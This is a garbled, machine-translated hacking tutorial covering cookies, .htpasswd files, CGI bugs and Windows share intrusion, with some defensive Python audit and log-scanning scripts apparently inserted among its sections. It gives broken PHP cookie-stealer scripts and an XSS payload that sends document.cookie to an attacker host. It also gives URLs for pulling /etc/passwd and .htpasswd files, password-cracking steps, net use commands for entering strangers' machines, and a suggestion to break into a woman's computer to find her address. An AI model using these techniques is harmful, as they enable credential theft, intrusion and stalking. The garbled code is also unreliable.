The Most Basic Understanding to Become a Hacker - Part 3

20. What is a cookie?

Cookies are small pieces of structured data shared between the web site and the user's browser. They are stored as small text files (less than 4k in size). Sites create them to store and retrieve information about users who visited the site and the pages they went through.

This information may include user names, passwords, preferences, habits, etc. Cookies are saved by the user's browser on his or her hard disk; not all browsers support cookies. After a visit to the site, information about the user is stored in the cookie. At the next visit, the site may reuse the information in the cookie (such as forum login information) so that the user does not have to log in again or re-enter other information. The problem is that many sites handle the reuse of cookie information carelessly: they do not fully check or encrypt the information in the cookie, and these loopholes help hackers break in and take control of the site.

Cookies usually contain the following components:

+ Name: set by the web site programmer.
+ Domain: the domain from which the cookie is created and sent.
+ Path: information about the path at the web site you are viewing.
+ Expiration Date: the date when the cookie expires.
+ Secure: if this flag is set in the cookie, the cookie is sent only over an encrypted connection between the browser and the server.
+ Other values: the specific data that the web server stores for later identification. These values do not contain whitespace, dots, and semicolons, and are limited to 4k.

(Documents from Viethacker.net)
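The cookie components listed above can be checked from the defender's side. The following is an added example (not part of the original tutorial) that parses `Set-Cookie` header values and reports missing protective attributes; the sample headers are constructed, and the `HttpOnly` and `SameSite` attributes are standard cookie attributes that the list above does not mention.

```python
import re

# Constructed sample Set-Cookie values (not taken from any real site).
SAMPLE_HEADERS = [
    "sid=3f9a1c; Path=/; Domain=forum.example",
    "sid=3f9a1c; Path=/; Secure; HttpOnly; SameSite=Lax",
    "password=hunter2; Expires=Wed, 01 Jan 2031 00:00:00 GMT; Secure; HttpOnly; SameSite=Strict",
]
CREDENTIAL_NAME = re.compile(r"pass|pwd", re.I)


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, attributes)."""
    first, *rest = [part.strip() for part in header.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for part in rest:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit(header):
    """Return (cookie name, list of findings) for one Set-Cookie value."""
    name, _value, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("no Secure: cookie is also sent over unencrypted HTTP")
    if "httponly" not in attrs:
        findings.append("no HttpOnly: page script can read it via document.cookie")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: cross-site sending left to browser defaults")
    if CREDENTIAL_NAME.search(name):
        findings.append("name suggests a credential is stored client-side")
    return name, findings


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        name, findings = audit(header)
        print(name, "->", findings or "ok")
```
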

21. The cookie stealing technique

First, open notepad and then copy the following code into notepad:

CODE
& lt;? php
define (`` LINE``, `` rn``);
define (`` HTML_LINE``, ``
``);
function getvars ($ arr, $ title)

$ res = `` ``;
$ len = count ($ arr);
if ($ len & gt; 0)

if (strlen ($ title) & gt; 0)

print (`` [-------- $ title --------] `` .HTML_LINE);
$ res. = `` [-------- $ title --------] ``. LINE;

foreach ($ arr as $ key = & gt; $ value)

print (`` [$ key] ``. HTML_LINE);
In ($ arr [$ key] .HTML_LINE);
$ res. = `` [$ key] ``. LINE . $ arr [$ key]. LINE;


return $ res;

// get current date
$ now = date (`` Y-m-d H: i: s``);
// init
$ myData = `` [----- $ now -----] ``. LINE;
// get
$ myData. = getvars ($ HTTP_GET_VARS, `` ``);
// file
$ file = $ REMOTE_ADDR. `` .txt``;
$ mode = `` r + ``;
if (! file_exists ($ file))
$ mode = `` w + ``;
$ fp = fopen ($ file, $ mode);
fseek ($ fp, 0, SEEK_END);
fwrite ($ fp, $ myData);
fclose ($ fp);
1 & gt;

or

CODE
& lt;? php
if ($ contents & amp; $ header) {
mail (`` victim @ yahoo.com``, `` from mail script``, $ contents, $ header)
die (`could not email it`);
sleep (2);
1 & gt;
& lt; script language = javascript & gt;


& lt;? php
} else {
echo `` nope``;

(Please correct victim@yahoo.com to your Mail address).

Save this file as "<your name>.php" and then upload it to a host that supports PHP; in my example it is abc.php (for those of you who have built web sites this will be very easy, right?). This snippet will steal the victim's information (and possibly cookies) when they open data that contains the code, and automatically save that information to a file named <victim's ip>.txt

There is another way to get cookies, used on forums that have an unfixed error: when posting, you add the following code to your post:

CODE
document.write (` )


where host_php is the address to which you uploaded the cookie-stealing file,
and abc.php is my example file.
For example, when applied in the img tag, we use the following:

CODE
`) & gt;


or:

[CODE
img] javascript: Document.write (`& amp; # x3cimg src = http: //host_php/docs.php? docs =` + escape (document .cookie) + `& amp; # x3e`)" & gt;


You can find web pages to practice this tutorial on by going to google.com and searching for these faulty forums with the keyword `Powered by ... forum`, for the following forums: iconboard, Ultimate Bulletin Board, vBulletin Board, Snitz.
There are many other cookie-stealing snippets as well; you can look for more yourself.

22. How to disable password protected Website

When you look for information on a web site, some areas will block you and show a box asking for a password; this is a private area that keeps confidential information for a limited number of people or groups (the hacking area of viethacker.net that e-chip mentioned, for example). When we click on the link, it (usually) calls on the .htpasswd and .htaccess files located in the same directory to protect the site. Why is there a dot in front of the `.htaccess` filename? Files whose names start with a `.` are treated by web servers as configuration files, and they are hidden when you browse the directory protected by .htaccess. The .htaccess file is responsible for controlling access to the protected link you want to open. The .htpasswd file manages the passwords and user names, and keeps that information in encrypted form for the other file. When you enter both correctly, the link opens. Take a look at the following:

CODE
Graham:F#.DG*m38d%RF
Webmaster:GJA54j.3g9#$@f


The user name can be read, but can you make sense of the password you see there? Of course not. Do you understand why you cannot read it? This is where the .htaccess file comes in. Because the two files are in the same directory, they work together to protect each other, so we are not going to foolishly try to break in and crack the password (when I have no password-cracking tool at hand, I am also researching how to get in directly; if I succeed I will post it for you). The flaw is this: what happens if the .htpasswd file is located outside the directory protected by the .htaccess file? We will steal it easily; see the following link:

http://www.company.com/cgi-bin/protected/


To check whether the .htpasswd file is protected by .htaccess or not, enter the following URL:

http://www.company.com/cgi-bin/protected/.htpasswd

If you get a `File not found` or similar answer, the file is definitely not protected; look for it using one of the following URLs:

http://www.company.com/.htpasswd
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htpasswd
http://www.company.com/cgi-bin/passwd/.htpasswd

If you still do not see it, try other similar URLs (it may be located in the root directory) until you find it.
Once you have found this file, use `John the ripper` or `Crackerjack` to crack the passwords in it. You know what to do next: take a valid user name and password and get into the private area to see what they "confide" in there, but do not change their passwords or stir things up.
You can also apply this method to get the admin password, because most of the members of the closed group are "authorized".
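The weakness described in this section is a password file that sits somewhere the web server will serve it. The following is an added example (not part of the original tutorial) of an audit a site owner can run: it reads every `.htaccess` under a document root, follows the Apache `AuthUserFile` directive, and reports password files that resolve inside the document root. The directory layout and file names are constructed for the demonstration, and only absolute `AuthUserFile` paths are handled.

```python
import os
import re
import tempfile

# AuthUserFile is the Apache directive that names the password file.
AUTH_USER_FILE = re.compile(r'^\s*AuthUserFile\s+"?([^"\s]+)"?', re.I | re.M)


def find_exposed_password_files(docroot):
    """Return (.htaccess path, password file) pairs where the file lies inside docroot."""
    docroot = os.path.realpath(docroot)
    exposed = []
    for dirpath, _dirs, files in os.walk(docroot):
        if ".htaccess" not in files:
            continue
        htaccess = os.path.join(dirpath, ".htaccess")
        with open(htaccess, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        for match in AUTH_USER_FILE.finditer(text):
            if not os.path.isabs(match.group(1)):
                continue  # relative paths depend on ServerRoot; not handled here
            target = os.path.realpath(match.group(1))
            if os.path.commonpath([docroot, target]) == docroot:
                exposed.append((htaccess, target))
    return exposed


def build_sample_tree(base):
    """Constructed layout: 'members' points inside the docroot, 'staff' outside it."""
    docroot = os.path.join(base, "htdocs")
    inside = os.path.join(docroot, "cgi-bin", "passwords", ".htpasswd")
    outside = os.path.join(base, "private", "staff.htpasswd")
    for area, pwfile in (("members", inside), ("staff", outside)):
        os.makedirs(os.path.dirname(pwfile), exist_ok=True)
        with open(pwfile, "w") as fh:
            fh.write("user:PLACEHOLDER-HASH\n")
        os.makedirs(os.path.join(docroot, area), exist_ok=True)
        with open(os.path.join(docroot, area, ".htaccess"), "w") as fh:
            fh.write(f'AuthType Basic\nAuthName "{area}"\n'
                     f'AuthUserFile "{pwfile}"\nRequire valid-user\n')
    return docroot


def run_demo():
    """Build the sample tree and return exposed files relative to the docroot."""
    with tempfile.TemporaryDirectory() as base:
        docroot = build_sample_tree(base)
        return [os.path.relpath(target, os.path.realpath(docroot))
                for _htaccess, target in find_exposed_password_files(docroot)]


if __name__ == "__main__":
    print(run_demo())
```

Any file the audit reports should be moved outside the document root, and the server configuration should deny requests for `.ht*` files.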

CGI is an abbreviation for the Common Gateway Interface. Most websites use CGI scripts to perform the tasks they need around the clock. CGI scripts are essentially programs written in languages such as Perl, C, C++, and VBScript and uploaded to the web site; Perl is the most popular because it is easy to write, takes up little space and, above all, can run continuously 24 hours a day.
Generally, CGI scripts are stored in the /cgi-bin/ directory of the web site, as in the following:

http://www.company.com/cgi-bin/login.cgi

They are used for specific tasks such as:
+ Counting the number of visitors.
+ Controlling what visitors can and cannot do on your website.
+ Managing the user names and passwords of members.
+ Providing a mail service.
+ Providing linking and messaging services between members.
+ Providing detailed error messages.

24. The most basic Web hacking method through CGI scripts

Error 1: nph-test-cgi error

+ Enter the site name in your browser.
+ Type the following at the end: /cgi-bin/nph-test-cgi
At that point the URL will look something like this:

http://www.servername.com/cgi-bin/nph-test-cgi

If successful you will see the folders are stored inside. To see which folder you continue:


+ The file containing the passwd is usually located in the /etc directory, and you type in the following URL:

http://www.servername.com/cgi-bin/nph-test-cgi?/etc/

Error 2: php.cgi error

Similar to the above, you just type in the following URL to get the password file:

http://www.servername.com/cgi-bin/php.cgi?/etc/passwd

The important thing is that these are old errors, so sites to practice on are very hard to find; you go to google.com and type the keywords:

/cgi-bin/php.cgi?/etc/passwd
or cgi-bin/nph-test-cgi?/etc

Then you look on that page to try to fix the error to practice offline.
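Requests like the ones in sections 22 and 24 are easy to spot in a web server access log. The following is an added example (not part of the original tutorial) of detection logic for `.ht*` file probes and for `nph-test-cgi` / `php.cgi` requests whose query string is a file path; the log lines are constructed and use documentation IP ranges.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed access-log lines in common log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /cgi-bin/protected/.htpasswd HTTP/1.1" 403 199
198.51.100.7 - - [12/Mar/2024:10:01:03 +0000] "GET /.htpasswd HTTP/1.1" 200 45
198.51.100.7 - - [12/Mar/2024:10:01:05 +0000] "GET /cgi-bin/%2ehtpasswd HTTP/1.1" 404 196
203.0.113.20 - - [12/Mar/2024:10:02:11 +0000] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 196
203.0.113.20 - - [12/Mar/2024:10:02:12 +0000] "GET /cgi-bin/nph-test-cgi?/etc/ HTTP/1.0" 404 196
192.0.2.44 - - [12/Mar/2024:10:03:00 +0000] "GET /cgi-bin/login.cgi?user=alice HTTP/1.1" 200 512
"""
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})\b')


def classify(target):
    """Name the probe type for a request target, or return None if it looks normal."""
    parts = urlsplit(target)
    path, query = unquote(parts.path), unquote(parts.query)  # decode %2e etc. first
    if any(segment.startswith(".ht") for segment in path.split("/")):
        return "htfile-probe"
    if path.endswith(("/nph-test-cgi", "/php.cgi")) and query.startswith("/"):
        return "cgi-file-read-probe"
    return None


def scan(log_text):
    """Group suspicious requests by client IP as (rule, target, status) tuples."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        match = LINE.match(line)
        if not match:
            continue
        ip, _method, target, status = match.groups()
        rule = classify(target)
        if rule:
            hits[ip].append((rule, target, int(status)))
    return dict(hits)


def served(hits):
    """Probes answered with 200: the server actually returned the file."""
    return [(ip, target) for ip, rows in hits.items()
            for _rule, target, status in rows if status == 200]


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print(found)
    print("served:", served(found))
```
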

25. Computer penetration techniques are available online

Accessing your computer online is a difficult and difficult technique. You can say easy when you use the ENT tool 3 but you will have problems using it as the speed of use on the victim machine will be significantly slow and the machine they do not share is not invasive. So if they shut down, they will get a crash when they do not have the account, have a smoother, less speed down and can penetrate when the victim does not share is to use DOS program. attack . Ok, I'll start:
+ Use an IP scanner like ENT 3 to scan the target IP.
+ Go to Start ==> type the command cmd.
+ In the DOS window type "net view"

CODE
For example: c:\>net view \\203.162.30.xx


Look at the results; if the machine has a share it is very easy, you just type the command

net use <any drive on your computer>: <victim's share>

For example: c:\>net use E: \\203.162.30.xx\C

If the victim machine requires a password when you connect, download a password-cracking program to use (in my case I load the program "pqwak2", which applies to passwords on computers using Win98 or WinMe, and the "xIntruder" program for Win NT). The two programs are used in a similar way: on the first line we enter the IP of the victim, and on the second line we type the victim's shared drive; for "xIntruder", pay attention to its Delay: on the LAN its Delay is 100, and on the Internet it is over 5000.
If the victim's machine does not have a share, then type:

net use <any drive on your computer>: c$ (or d$) "administrator"

For example: net use E: \\203.162.30.xx\C$ "administrator"

c$ is the default share for every "administrator" user.
We can use this method to break into the machine of the friend whom she secretly remember to find the data related to her address (provided she is using the machine at home and you are lucky to find that address). You just need to chat Y! Mass then DOS command:

c: netstat -n

When you use this method, turn off all other windows just to frame Y! Mass with her, it will make it easier for you to determine her IP address. Then you use the intrusion that I mentioned above. (Perhaps our old tycoon flirted with her in the remote network also used this way to break through and find out her address here. where, hi`hi`.)
You will succeed if your victim machine does not have a firewall or proxy installed.

================================================== = =

Many of you have asked me to give you exact addresses to practice on, but I cannot give them out, because from experience, when the instructions included real addresses, some of you who got admin rights while practicing deleted their databases. As a result, HVA came to be known as a source of online vandalism. So at most I will just show you how to find those faults, and not give you a specific address.

================================================== = =

In Part 4, I will discuss the technique of breaking into a computer while it is online, the steps to take when deciding to hack a web page, techniques for finding faulty web sites to practice on, and web hacking techniques through Gallery errors, etc.

GOOD LUCK!